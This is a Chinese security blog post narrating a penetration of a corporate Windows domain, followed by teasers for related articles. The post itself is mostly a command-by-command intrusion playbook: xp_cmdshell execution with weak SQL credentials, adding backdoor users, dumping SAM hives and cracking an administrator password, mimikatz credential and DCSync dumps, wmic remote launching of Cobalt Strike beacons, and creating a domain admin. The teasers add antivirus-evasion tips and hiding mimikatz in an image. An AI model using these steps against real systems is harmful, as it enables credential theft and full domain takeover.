<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    記一次常規的域滲透

    VSole2023-03-30 09:48:11

    1.入口是weblogic,上線無殺軟,不再贅述寫webshell和下載馬子的過程,因此直接到上線cs:

    一上來不要大規模的掃描,先對網絡環境進行信息收集,發現沒有域環境:

    systeminfo

    使用cs自帶的mimikatz功能導出密碼:

    cs: logonpasswords

    對該網段使用該憑證進行pth橫向(通過hash進行傳遞):

    該網段均橫向失敗,對fscan掃描結果進行數據處理,發現內網存在域和exchange,且沒有弱口令,嘗試對掃描出來的17-010和spring漏洞測試均嘗試失敗:


    于是使用frp掛上代理進內網掃描弱口令

    發現一個弱口令,嘗試鏈接,成功登錄并命令執行,但是是服務權限:

    23.exe 20.20.20.17 sa sa@12345 master xp_cmdshell "whoami"

    使用自帶的clr_efspotato,提權失敗:

    23.exe 20.20.20.17 sa sa@12345 master clr_efspotato "whoami"

    嘗試使用SharpSQLTools上傳提權文件,通過提權文件進行添加用戶,遠程桌面登陸后,手動執行beacon.exe

    23.exe 20.20.20.17 sa sa@12345 master sourcefile destationfile

    提權成功后接下來嘗試添加用戶:(這里引號需要轉義,多加一個引號即可)

    23.exe 20.20.20.17 sa sa@12345 master xp_cmdshell "cmd.exe /c 666.exe ""net user jijida admin!@#45""

    okkkkkkkkkk,嘗試登錄:

    發現卡巴斯基和edr,直接關閉:

    私密馬賽,我沒能關掉,嘗試通過導出密碼拿下高用戶的權限:

    reg save hklm\sam sam.hivereg save hklm\system system.hive

    本地secertdump解密這里我是從遠程桌面托文件下來所以很卡,只選擇下載了兩個文件,security可以選擇不下載:

    python secretsdump.py -system system.hive -sam sam.hive local

    administrator賬戶進行解密得到密碼:@Nn031985

    成功拿到管理員權限,在當前權限下繼續使用當前賬戶進行橫向:

    發現17,20,25,57都可以橫向

    在57上發現域環境:

    存在卡巴斯基,直接關閉,上傳beacon.exe:

    上線cs:

    使用當前會話進行信息收集,導出密碼的過程中發現一些郵箱口令:

    注入域管進程:

    在域管進程下進行域環境的信息收集,先查域管:

    net group "domain admins" /domain

    域成員:

    net user /domain

    找域控:

    ping dc

    這里不選擇添加賬戶密碼的話,默認選擇當前權限(域管權限)進行橫向:

    wmic /mode:20.20.20.85 os get name

    導出域內所有用戶hash,這里使用mimikatz自帶的dcsync功能:

    mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit

    20上有個exchange服務,嘗試對20進行橫向滲透:

    建立ipc鏈接后,使用UNC路徑傳馬:

    \\ip\C$\

    成功上線:

    wmic /node:20.20.20.20 process call create "cmd.exe /c beacon.exe"

    傳馬子:

    上線:

    新建一個域管:

    3389嘗試登錄:


    mimikatz
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    mimikatz的這個功能從本質上是解析Windows的數據庫文件,從而獲取其中存儲的用戶哈希。
    本文主要討論學習mimikatz中與Kerberos協議相關的代碼
    而且Mimikatz這些知名工具的內容像mimikatz、作者信息之類的字符串就很容易被做為特征碼識別。可以利用Visual Studio的替換功能實現關鍵字的處理。
    過程Set-ExecutionPolicy Unrestricted -Scope CurrentUser //設置腳本策略Import-Module .\Invoke-PSimage.ps1 //導入腳本模塊Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\mimikatz.png -Image .\demo.jpg -Web. 開啟一個目標可以訪問的web服務,加載生成的mimikatz.png圖片。修改 example.com改成自己的web服務地址。然后進行遠程加載即可。
    萌新如何玩轉mimikatz
    2022-08-29 06:48:46
    暑假快到了,身邊好多師傅都開啟了"卷王"模式,而我也在南城師傅的幫助下開始了內網這個新征程;mimikatz就是我遇見的一個坎,我希望記錄下這個過程,盡可能的幫助大家更快的掌握mimikatz的用法和技巧。最后,再次謝謝南城師傅對本文的指導與幫助!!
    list 列舉出當前會話的所有緩存憑證,tgt列出當前會話的tgt信息。
    主要功能配合使用工具(如Mimikatz)掃描本地密碼,并將密碼寫入source/pass_list.txt 以下工具(1)簡稱(1)(1)檢測域。檢測到域后,工具 (2)自動使用 “net user /domain”等語法檢測判斷域用戶(3)探索其他存活域主機:自動將網段IP信息寫入source/ip_list.txt)語法:for /L %I in (1,1,254) DO @ping -w
    Linux抓取Root明文密碼
    2021-10-24 08:30:58
    在window下獲取到administraot權限以后,使用mimikatz不管是抓取明文密碼或是hash都很方便,但是在Linux就算獲取到root權限了,獲取hash倒是很簡單cat一下就行,但是大概率很難解密出來。那么如何在Linux抓取root用戶的明文密碼,方面后續滲透呢?
    橫向移動相關
    2022-05-08 06:31:56
    橫向移動相關
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类